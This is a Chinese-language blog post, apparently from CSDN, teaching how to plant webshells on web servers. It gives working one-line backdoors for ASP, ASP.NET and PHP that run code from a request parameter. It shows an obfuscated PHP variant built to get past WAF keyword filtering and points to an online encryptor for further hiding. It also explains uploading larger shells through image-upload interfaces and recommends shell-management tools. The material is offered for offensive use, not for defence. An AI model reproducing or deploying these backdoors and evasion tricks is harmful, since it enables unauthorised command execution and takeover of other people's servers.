版权声明:本文为博主原创文章,转载请注明原创链接! https://blog.csdn.net/qq_39112646/article/details/88720475
一 :定义
木马实际上就是一个包含了执行请求并返回结果的文件,木马通常来说分为大马和小马,这是针对文件的大小来进行区分的。
小马通常是通过在线文本编辑器上传的,可以将小马的代码插入上传的代码中,然后通过小马上传大马。
如果有上传图片或者文件的接口,一般直接上传大马
二:最简单的木马
ASP一句话木马
<%eval request("cknife")%>
ASP.NET一句话木马
<%@Page Language="Jscript"%><%eval(Request.Item["cknife"],"unsafe");%>
PHP一句话木马
<?php @eval($_POST['cknife'])?>
三:小马变形
WAF不光对输入的参数进行检查,对上传的数据和文件也会进行检查
WAF查杀木马一般都是以关键词为线索,也就是说避开一般的关键词就可以了。
采用替换关键词的部分字符、加密关键词、采用多个无用的函数构建关键词
原始一句话木马
<?php @eval($_POST['cknife']);?>
替换关键词的部分字符串
<?php
$st="tsop_"
$cmd=strtoupper($st[4].$st[3].$st[2].$st[1].$st[0]);
@eval(${cmd}['cknife'])
?>
这样还不够安全,通过PHP在线加密网加密后就很安全了
http://www.phpjm.net/encode.html
加密效果
四:大马
大马的功能有很多,可以查看服务器的详细信息,可以上传下载文件,可以执行系统命令,可以直接使用
一般通过上传图片的接口进行上传
五:木马连接工具
小马如果不借助工具去使用,就会显得太复杂了,推荐C刀 蚁剑,跨平台
在连接木马时,会使用一个随机的端口
更多webshell管理工具点击这里